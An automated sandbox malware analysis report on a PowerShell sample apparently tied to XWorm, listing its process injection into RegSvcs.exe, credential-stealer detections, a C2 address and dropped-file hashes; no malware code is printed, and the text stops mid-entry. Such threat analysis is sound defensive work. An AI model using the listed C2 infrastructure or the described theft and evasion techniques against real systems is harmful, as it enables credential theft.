Windows
Analysis Report
2.ps1
Overview
General Information
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 6640 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\2.p s1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6660 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - RegSvcs.exe (PID: 1456 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) - RegSvcs.exe (PID: 3652 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T17:13:47.590436+0100 | 2035595 | 1 | Domain Observed Used for C2 Detected | 92.255.57.155 | 56001 | 192.168.2.4 | 49730 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Window created: | Jump to behavior |
Source: | Code function: | 0_2_00007FFD9B7EA599 | |
Source: | Code function: | 0_2_00007FFD9B8B0FA4 | |
Source: | Code function: | 3_2_027448A0 | |
Source: | Code function: | 3_2_02741C30 | |
Source: | Code function: | 3_2_02741C1F | |
Source: | Code function: | 3_2_06120548 | |
Source: | Code function: | 3_2_061253C3 | |
Source: | Code function: | 3_2_061230A0 | |
Source: | Code function: | 3_2_06124E53 | |
Source: | Code function: | 3_2_06124E5C | |
Source: | Code function: | 3_2_06124F48 | |
Source: | Code function: | 3_2_0612549B | |
Source: | Code function: | 3_2_061253CC | |
Source: | Code function: | 3_2_06123090 | |
Source: | Code function: | 3_2_061229D2 |
Source: | Classification label: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Binary string: |
Source: | Code function: | 0_2_00007FFD9B7EB3EB | |
Source: | Code function: | 0_2_00007FFD9B7ED883 | |
Source: | Code function: | 0_2_00007FFD9B7E00C1 | |
Source: | Code function: | 0_2_00007FFD9B7EE6BA | |
Source: | Code function: | 0_2_00007FFD9B8B0549 |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | WMI Queries: |
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Memory written: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Binary or memory string: |
Source: | WMI Queries: |
Stealing of Sensitive Information |
---|
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Key opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 321 Windows Management Instrumentation | 1 DLL Side-Loading | 212 Process Injection | 1 Disable or Modify Tools | OS Credential Dumping | 431 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 331 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 212 Process Injection | Security Account Manager | 331 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Clipboard Data | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 213 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse | ||
3% | ReversingLabs |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
92.255.57.155 | unknown | Russian Federation | 42253 | TELSPRU | true |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1591074 |
Start date and time: | 2025-01-14 17:12:42 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 5s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2.ps1 |
Detection: | MAL |
Classification: | mal92.spyw.evad.winPS1@6/7@0/1 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 199.232.210.172, 4.245.163.56, 13.107.246.45
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target RegSvcs.exe, PID 3652 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
11:13:37 | API Interceptor | |
11:13:47 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
92.255.57.155 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | CAPTCHA Scam ClickFix, XWorm | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
bg.microsoft.map.fastly.net | Get hash | malicious | FormBook, PureLog Stealer | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook, PureLog Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TELSPRU | Get hash | malicious | XWorm | Browse |
| |
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.253995428229512 |
Encrypted: | false |
SSDEEP: | 6:kKSn9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:7DImsLNkPlE99SNxAhUe/3 |
MD5: | E47365A60D6A0E44ECFA6D05E437AD73 |
SHA1: | B17CDA63B7C01CD99651B02762996E2F4CE16B17 |
SHA-256: | B583BE8A84FBC9B424C09DA8DBC4F7DC3B419302CE3B364599C512F6B852191C |
SHA-512: | 89052D30B843304E362DDAD6629639CB2D4E7E9F104F94F45AA670DEDBA2B9D8D720DEF44034445C9EB133873DA3BFEC3777F17F67A80687273D26C0C31C591E |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllultnxj:NllU |
MD5: | F93358E626551B46E6ED5A0A9D29BD51 |
SHA1: | 9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03 |
SHA-256: | 0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D |
SHA-512: | D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1JJHCI8TJXK54HJ92K6H.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6221 |
Entropy (8bit): | 3.723083155478798 |
Encrypted: | false |
SSDEEP: | 96:SLX+33CxHCCkvhkvCCt8oVCjVVHedVCjVVHeC:SLX+yie8o8Kd8KC |
MD5: | 5A7F5483BE87145ACB1EEDECB73AFE44 |
SHA1: | CC9FF989A294AE17086CE9CC19420E2E269759B5 |
SHA-256: | 95D7852899159506762990C7A71812AB4C31651335112C72EDB5F9E517245706 |
SHA-512: | DD262B88B78B5DE092C644D6743A294434C2961DE003B8FEEC2C062647854F76609A654286EA60E15FEF11401F990E84825A78E553C5A6F530D0756E46D83A29 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 6221 |
Entropy (8bit): | 3.723083155478798 |
Encrypted: | false |
SSDEEP: | 96:SLX+33CxHCCkvhkvCCt8oVCjVVHedVCjVVHeC:SLX+yie8o8Kd8KC |
MD5: | 5A7F5483BE87145ACB1EEDECB73AFE44 |
SHA1: | CC9FF989A294AE17086CE9CC19420E2E269759B5 |
